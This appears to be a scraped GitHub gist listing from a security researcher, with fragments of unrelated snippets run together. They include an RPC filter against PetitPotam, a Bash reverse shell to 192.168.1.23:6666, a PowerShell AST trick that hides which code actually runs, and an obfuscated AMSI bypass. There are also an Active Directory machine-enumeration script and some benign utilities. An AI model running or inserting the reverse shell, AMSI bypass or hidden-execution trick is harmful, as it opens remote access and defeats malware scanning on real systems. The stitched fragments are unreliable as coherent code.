@k4nfr3
k4nfr3 / gist:9808709a83b9a56376ba92c332205ef0
Created January 23, 2025 14:13
RPC Filter against Coercer (petitPotam)
netsh
rpc filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=12345678-1234-ABCD-EF00-0123456789AB
add filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
bash -i >& /dev/tcp/192.168.1.23/6666 0>&1
$SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast
$ExecutedAst = [ScriptBlock]::Create("Write-Output 'My Hidden Hello Hidden'").Ast
$Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,$null,$null,$null,$ExecutedAst.EndBlock.Copy(),$null)
$Sb = $Ast.GetScriptBlock()
$Sb&
Add NugetComponent Microsoft.Win32.Registry
Add NugetComponent System.Security.Cryptography.ProtectedData
Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/
Tested on latest version Kiteworks 8.3.0
=========================================
/* Created by Sergei Gundorov 1/2/2020
* Intent: provide sample project for encrypting secrets with DPAPI while working with
* Power BI Embedded and API tutorials and samples.
k4nfr3 / velocity.py
Last active June 30, 2023 15:02
velocity.ch daily script to repurchase my free parking as I'm using it daily
import requests
import json
# Proxy settings for debug (with burp or other)
proxy_enable = False
proxy = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
#!/usr/bin/env python
# modifications of original script GetAdusers.py from Impacket.
# this version returns the list of last seen 24h machines
#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11
#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
#
#Password:
#[*] Querying 192.168.16.11 for information about domain.
#Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address
#-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------
#!/usr/bin/env python
from __future__ import print_function
import json
import re
import socket
import ssl
import subprocess
import sys
'ntdll.dll' '4097367' '0x3e8557'
'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662'
'RegNtPostCreateKey' '76320549262' '0x11c50f298e'
'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745'
'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb'
'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16'
'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8'
'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd'
'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8'
'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2'
Scraped from official web site: https://downloads.rclone.org/v.../SHA1SUMS
===========================================================================
Windows Clients
k4nfr3 / am.ps1
Last active February 3, 2022 12:02
AMSI Bypass
Write-Host '[+] Loading AMSI Bypass...'
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Write-Host '[+] done' -ForegroundColor green